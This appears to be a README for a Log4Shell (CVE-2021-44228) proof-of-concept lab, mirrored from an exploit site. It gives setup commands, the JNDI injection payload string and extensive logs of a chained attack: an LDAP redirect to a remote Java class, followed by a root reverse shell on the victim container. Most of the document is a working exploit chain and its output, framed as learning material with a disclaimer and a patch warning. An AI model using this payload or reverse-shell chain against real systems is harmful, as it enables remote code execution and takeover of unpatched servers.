## https://sploitus.com/exploit?id=54FE5E76-EAF4-5D84-B37F-06F12A6AFF71
# Self-contained lab environment PoC that runs a reverse-shell with Log4Shell (CVE-2021-44228)
This is a self-contained lab environment that runs the exploit safely, all from docker compose.
The affected versions are **Apache Log4j <=2.0โ2.14.1** and the CVE is tracked as **CVE-2021-44228** (CVSS score: 10.0).
### Do patch Apache Log4j to version 2.16+ asap !!!
## Prerequisites
This code requires Docker and Docker Compose.
## Description
`Dockerfile` and `docker-compose.yml` files are self-explanatory to build and start the lab environment.
Victim server [log4shell-server](https://github.com/j3kz/CVE-2021-44228-PoC/tree/master/log4shell-server) is built using [spring initializr](https://start.spring.io) demo project, including Log4j 2.14.1 vulnerable version through [spring-boot-starter-log4j2 2.6.1](https://github.com/j3kz/CVE-2021-44228-PoC/blob/124fd08f9e3fb5f455ffa5b1a5d8308abe51e5a8/log4shell-server/build.gradle#L19).
The vulnerable code is located inside [DemoApplication.java](https://github.com/j3kz/CVE-2021-44228-PoC/blob/124fd08f9e3fb5f455ffa5b1a5d8308abe51e5a8/log4shell-server/src/main/java/com/example/demo/DemoApplication.java#L29).
[Remote Code Execution](https://github.com/j3kz/CVE-2021-44228-PoC/blob/124fd08f9e3fb5f455ffa5b1a5d8308abe51e5a8/rce-server/src/ReverseShell.java#L8) is served by the [rce-server](https://github.com/j3kz/CVE-2021-44228-PoC/tree/master/rce-server).
Intermediate [LDAP server](https://github.com/j3kz/CVE-2021-44228-PoC/tree/master/ldap-server) is based on [Java Unmarshaller Security - Turning your data into code execution](https://github.com/mbechler/marshalsec).
Attack vector is performed from [this script](https://github.com/j3kz/CVE-2021-44228-PoC/blob/124fd08f9e3fb5f455ffa5b1a5d8308abe51e5a8/attack-vector/attack-vector.sh#L13) to setup a connection to the [reverse-shell](https://github.com/j3kz/CVE-2021-44228-PoC/tree/master/reverse-shell) server.
[Reverse-shell server](https://github.com/j3kz/CVE-2021-44228-PoC/tree/master/reverse-shell) waits for a connection, and sends a [command example](https://github.com/j3kz/CVE-2021-44228-PoC/blob/124fd08f9e3fb5f455ffa5b1a5d8308abe51e5a8/reverse-shell/reverse-shell.sh#L3) `echo $(whoami)` through the reverse shell, which is executed on the victim server [log4shell-server](https://github.com/j3kz/CVE-2021-44228-PoC/tree/master/log4shell-server).
## Usage:
```bash
git clone https://github.com/j3kz/CVE-2021-44228-PoC.git
cd CVE-2021-44228-PoC
docker compose up
```
```
ldap-server | Listening on 0.0.0.0:1389
```
LDAP server ready and listening.
```
reverse-shell | listening on [::]:4242 ...
```
Reverse-shell server ready and listening.
```
log4shell-server |
log4shell-server | . ____ _ __ _ _
log4shell-server | /\\ / ___'_ __ _ _(_)_ __ __ _ \ \ \ \
log4shell-server | ( ( )\___ | '_ | '_| | '_ \/ _` | \ \ \ \
log4shell-server | \\/ ___)| |_)| | | | | || (_| | ) ) ) )
log4shell-server | ' |____| .__|_| |_|_| |_\__, | / / / /
log4shell-server | =========|_|==============|___/=/_/_/_/
log4shell-server | :: Spring Boot :: (v2.6.1)
log4shell-server |
log4shell-server | 2021-12-18 12:31:37.695 INFO 1 --- [ main] c.e.d.DemoApplication : Starting DemoApplication using Java 1.8.0_181 on 46edaaf2f7eb with PID 1 (/app/spring-boot-application.jar started by root in /)
log4shell-server | 2021-12-18 12:31:37.739 INFO 1 --- [ main] c.e.d.DemoApplication : No active profile set, falling back to default profiles: default
log4shell-server | 2021-12-18 12:31:42.337 INFO 1 --- [ main] o.s.b.w.e.t.TomcatWebServer : Tomcat initialized with port(s): 8080 (http)
log4shell-server | 2021-12-18 12:31:42.439 INFO 1 --- [ main] o.a.c.c.StandardService : Starting service [Tomcat]
log4shell-server | 2021-12-18 12:31:42.440 INFO 1 --- [ main] o.a.c.c.StandardEngine : Starting Servlet engine: [Apache Tomcat/9.0.55]
log4shell-server | 2021-12-18 12:31:42.717 INFO 1 --- [ main] o.a.c.c.C.[.[.[/] : Initializing Spring embedded WebApplicationContext
log4shell-server | 2021-12-18 12:31:42.718 INFO 1 --- [ main] w.s.c.ServletWebServerApplicationContext : Root WebApplicationContext: initialization completed in 4549 ms
log4shell-server | 2021-12-18 12:31:44.660 INFO 1 --- [ main] o.s.b.w.e.t.TomcatWebServer : Tomcat started on port(s): 8080 (http) with context path ''
```
Vulnerable server ready and listening.
```
attack-vector | ๐ log4shell-server:8080 is listening!
attack-vector | ๐ Sending attack vector ...
```
Attack server waiting connection and sending the attack-vector.
```
log4shell-server | 2021-12-18 12:31:44.740 INFO 1 --- [ main] c.e.d.DemoApplication : Started DemoApplication in 8.402 seconds (JVM running for 11.113)
log4shell-server | 2021-12-18 12:31:45.110 INFO 1 --- [nio-8080-exec-1] o.a.c.c.C.[.[.[/] : Initializing Spring DispatcherServlet 'dispatcherServlet'
log4shell-server | 2021-12-18 12:31:45.110 INFO 1 --- [nio-8080-exec-1] o.s.w.s.DispatcherServlet : Initializing Servlet 'dispatcherServlet'
log4shell-server | 2021-12-18 12:31:45.112 INFO 1 --- [nio-8080-exec-1] o.s.w.s.DispatcherServlet : Completed initialization in 2 ms
ldap-server | Send LDAP reference result for attack-vector redirecting to http://rce-server:3000/ReverseShell.class
rce-server | 172.31.0.3 - - [18/Dec/2021:12:31:45 +0000] "GET /ReverseShell.class HTTP/1.1" 200 891 "" "Java/1.8.0_181"
```
Vulnerable server executing request, logging it, so LDAP server is requesting RCE to the RCE server.
```
reverse-shell | connect to [::ffff:172.31.0.5]:4242 from [::ffff:172.31.0.3]:43877 ([::ffff:172.31.0.3]:43877)
reverse-shell | ๐ป Hello from the log4shell-server! We are root.
reverse-shell | listening on [::]:4242 ...
reverse-shell | connect to [::ffff:172.31.0.5]:4242 from [::ffff:172.31.0.3]:41249 ([::ffff:172.31.0.3]:41249)
```
RCE is executed and victim server is opening the reverse shell, and reverse-shell server is able to execute execute distant commands.
```
log4shell-server | 2021-12-18 12:31:45.187 INFO 1 --- [nio-8080-exec-1] Demo : GET /hello param:name: ReverseShell@22fb868
log4shell-server | 2021-12-18 12:31:45.345 INFO 1 --- [nio-8080-exec-1] Demo : GET /hello header:host: log4shell-server:8080
log4shell-server | 2021-12-18 12:31:45.345 INFO 1 --- [nio-8080-exec-1] Demo : GET /hello header:user-agent: curl/7.80.0
log4shell-server | 2021-12-18 12:31:45.345 INFO 1 --- [nio-8080-exec-1] Demo : GET /hello header:accept: */*
```
Victim server is logging the attack vector request.
```
attack-vector | ๐ฅ Server returned:
attack-vector | > HTTP/1.1 200
attack-vector | > Content-Type: text/plain;charset=UTF-8
attack-vector | > Content-Length: 52
attack-vector | > Date: Sat, 18 Dec 2021 12:31:45 GMT
attack-vector | >
attack-vector | > Hello ${jndi:ldap://ldap-server:1389/attack-vector}!
attack-vector | Attack should be successfull, have a nice day!
```
Attack vector request is logging the response, and leaves the party.
## Disclaimer
This repository is only about learning from the vulnerability.
The project is not intended to be and cannot be used as a malicious exploit of the CVE-2021-44228 without the consentment of victim server's owner.
**Any usage for malicious activity is prohibited and punished by severe laws.**
## References
https://vulners.com/cve/CVE-2021-44228
https://www.lunasec.io/docs/blog/log4j-zero-day/
https://mbechler.github.io/2021/12/10/PSA_Log4Shell_JNDI_Injection/
https://github.com/christophetd/log4shell-vulnerable-app